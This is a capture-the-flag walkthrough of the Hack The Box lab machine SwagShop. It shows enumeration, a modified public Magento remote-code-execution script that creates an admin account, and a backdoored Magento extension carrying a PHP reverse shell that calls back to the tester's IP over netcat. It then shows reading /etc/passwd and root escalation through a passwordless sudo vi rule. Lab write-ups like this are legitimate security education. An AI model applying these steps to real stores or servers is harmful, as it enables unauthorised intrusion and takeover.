SwagShop Hack The Box Writeup

This post documents the complete walkthrough of SwagShop, an active vulnerable VM created by ch4p and hosted at Hack The Box

Description
SwagShop is a retired GNU/Linux eCommerce web server using an outdated/unpatched version of `Magento` with known vulnerabilities and exploits. The Linux system allows the `Apache` user to run a sudo command with no password required, allowing privilege escalation to root.

❯ Information Gathering

Starting with a Nmap scan

Nmap cheat sheet

1•➜ nmap -sV -sC -oA namp 10.10.10.140
2...
3 └> PORT   STATE SERVICE VERSION 
4    22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) 
5    22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) 
6    80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu)) 
7    |_http-server-header: Apache/2.4.18 (Ubuntu) 
8    |_http-title: Home page Service Info: OS: Linux;

From the SSH flag, we guessed this box to be Ubuntu Xenial and Nmap finds 80/tcp open.

❯ Web Pages Enumeration

Going to http://10.10.10.140 in the browser

we find a Magento shop with some HTB swag available.The pages are copyrighted from 2014, We can see at this page that the last released version in 2014 was 1.9.x.

Browsing around, you will notice that the items are placed under a folder called index.php/ (http://10.10.10.140/index.php/)

by running two GoBuster scans on http://10.10.10.140/ and http://10.10.10.140/index.php/ we find the admin panel at http://10.10.10.140/index.php/admin/

And http://10.10.10.140/downloader/ to access Magento Connect Manager. You can upload new Magento packages, which contains PHP files inside.

❯ Exploitation

We use searchsploit to find exploits in Magneto 1.9.x

and we notice a remote code execution exploit

Exploit Title	Path (/usr/share/exploitdb/)
Magento eCommerce - Remote Code Execution	exploits/xml/webapps/37977.py

We need to tweak the exploit a little for the odd $IP/index.php/admin requirement instead of $IP/admin

1...
2target = "http://10.10.10.140/"
3
4if not target.startswith("http"):
5   target = "http://" + target
6
7if target.endswith("/"):
8   target = target[:-1]
9
10target_url = target + "/index.php" + "/admin/Cms_Wysiwyg/directive/index/"
11...

we run the script

1• ➜ python 37977.py  
2 └> WORKED
3    Check http://10.10.10.140/admin with creds forme:forme

now we can log in to the admin panel http://10.10.10.140/index.php/admin and http://10.10.10.140/downloader with creds forme:forme

❯ Getting a Reverse Shell

Using the Magento Downloader/Magento Connect, we attempt to upload an extension with a PHP reverse shell.

Download any legit Magento package, we’ll use LavaMagentoBD from GitHub/P34C3-07/LavaMagentoBD then extract lavamagento_bd.tgz we’ll have to modify its contents.

1•➜ tar -xzvf lavalamp_magento_bd.tgz

edit the file ./App/code/community/Lavalamp/Connector/controllers/IndexController.php and replace its contents with a PHP reverse shell, we’ll use PHP-Reverse-Shell from Github/pentestmonkey/php-reverse-shell make sure to change the $IP field to your IP address. we will use port 1234

1$ip = '10.10.14.115';  // CHANGE THIS
2$port = 1234;

get the MD5 hash for the file

1• ➜ md5sum ./App/code/community/Lavalamp/Connector/controllers/IndexController.php    
2└> 7587816c42712b0c9fe6dccb2c6c5300  IndexController.php

copy it then edit package.xml and replace IndexController.php hash

1<dir name="controllers">
2        <file hash="7587816c42712b0c9fe6dccb2c6c5300" 
3              name="IndexController.php"/>
4    </dir>

compress the files back into .tgz file

1•➜ tar -cvzf lavalamp_magento_bd.tgz -c ./*

then upload the file to http://10.10.10.140/downloader/ login with creds forme:forme if the extension is loaded successfully you should see

start listening using netcat

1•➜ nc -v -n -l -p 1234

then in the browser navigate to http://10.10.10.140/app/code/community/Lavalamp/Connector/controllers/IndexController.php in the terminal you should see that we got a reverse shell

1•➜ nc -nvlp 1234
2└> listening on [any] 1234 ...
3   connect to [<IP>] from (UNKNOWN) [10.10.10.140] 44650
4   Linux swagshop 4.4.0-146-generic #172-Ubuntu SMP x86_64 GNU/Linux
5   13:22:28 up 32 min,  0 users,  load average: 4.31, 2.61, 1.86
6   USER     TTY      FROM             [email protected]   IDLE   JCPU   PCPU WHAT
7   uid=33(www-data) gid=33(www-data) groups=33(www-data)
8   /bin/sh: 0: can't access tty; job control turned off

we are connected now with the username www-data, but we still need to spawn a bash shell with tty

1$ python -c 'import pty; pty.spawn("/bin/bash")'
2www[email protected]:/$

❯ Own User

Now that we have a shell on the box we can view etc/passwd

1•➜ [email protected]:/$ cat /etc/passwd
2└> cat /etc/passwd
3   root:x:0:0:root:/root:/bin/bash
4   daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
5   bin:x:2:2:bin:/bin:/usr/sbin/nologin
6   sys:x:3:3:sys:/dev:/usr/sbin/nologin
7   sync:x:4:65534:sync:/bin:/bin/sync
8   games:x:5:60:games:/usr/games:/usr/sbin/nologin
9   man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
10   lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
11   mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
12   news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
13   uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
14   proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
15   www-data:x:33:33:www-data:/var/www:/bin/bash
16   backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
17   list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
18   irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
19   gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:...
20   nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
21   systemd-timesync:x:100:102:systemd Time Synchronization,,,:...
22   systemd-network:x:101:103:systemd Network Management,,,:...
23   systemd-resolve:x:102:104:systemd Resolver,,,:...
24   systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/...
25   syslog:x:104:108::/home/syslog:/bin/false
26   _apt:x:105:65534::/nonexistent:/bin/false
27   lxd:x:106:65534::/var/lib/lxd/:/bin/false
28   mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
29   messagebus:x:108:112::/var/run/dbus:/bin/false
30   uuidd:x:109:113::/run/uuidd:/bin/false
31   dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
32   sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
33   haris:x:1000:1000:haris,,,:/home/haris:/bin/bash

we notice the user haris

1•➜ [email protected]:/$ ls -alh /home/haris
2└> ls -alh /home/haris
3   total 36K
4   drwxr-xr-x 3 haris haris 4.0K May  8 09:21 .
5   drwxr-xr-x 3 root  root  4.0K May  2 14:48 ..
6   -rw------- 1 haris haris   54 May  2 14:56 .Xauthority
7   lrwxrwxrwx 1 root  root     9 May  8 09:20 .bash_history -> /dev/null
8   -rw-r--r-- 1 haris haris  220 May  2 14:48 .bash_logout
9   -rw-r--r-- 1 haris haris 3.7K May  2 14:48 .bashrc
10   drwx------ 2 haris haris 4.0K May  2 14:49 .cache
11   -rw------- 1 root  root     1 May  8 09:20 .mysql_history
12   -rw-r--r-- 1 haris haris  655 May  2 14:48 .profile
13   -rw-r--r-- 1 haris haris    0 May  2 14:49 .sudo_as_admin_successful
14   -rw-r--r-- 1 haris haris   33 May  8 09:01 user.txt

we find user.txt

1•➜ [email protected]:/$ cat /home/haris/user.txt
2└> cat /home/haris/user.txt
3   <user flag>

❯ Privilege Escalation: Own Root

Enumerating the system leads to the finding that sudo -l returns the list of the user’s privileges, and shows that running vi with a specific path /var/www/html/* grants superuser privileges, without a password entry, required

1•➜ [email protected]:/$ sudo -l
2└> sudo -l
3   Matching Defaults entries for www-data on swagshop:
4       env_reset, mail_badpass,
5       secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\
6       :/sbin\:/bin\:/snap/bin
7   
8   User www-data may run the following commands on swagshop:
9       (root) NOPASSWD: /usr/bin/vi /var/www/html/*

open a file using vi in /var/www/html/*

1•➜ [email protected]:/$ sudo /usr/bin/vi /var/www/html/Bad3r.sh
2└> sudo /usr/bin/vi /var/www/html/Bad3r.sh
3   Vim: Warning: Output is not to a terminal
4   Vim: Warning: Input is not from a terminal
5   
6   E558: Terminal entry not found in terminfo
7   ‘unknown’ not known. Available builtin terminals are:
8    builtin_amiga
9    builtin_beos-ansi
10    builtin_ansi
11    builtin_pcansi
12    builtin_win32
13    builtin_vt320
14    builtin_vt52
15    builtin_xterm
16    builtin_iris-ansi
17    builtin_debug
18    builtin_dumb
19   defaulting to ‘ansi’

inside vi you can spawn a root shell

1:!/bin/bash
2~
3~

in the interactive shell, we can get the root flag

1•➜ whoami
2└> root
3•➜ cat /root/root.txt
4     <root flag>
5        ___ ___
6      /| |/|\| |\
7     /_| ´ |.` |_\           We are open! (Almost)
8     |     | .   |                                   |
9     | --- | --- | --------------------------------- |
10     |     | .   | Join the beta HTB Swag Store!     |
11     | ___ | .__ | https://hackthebox.store/password |
12   
13                      PS: Use root flag as password!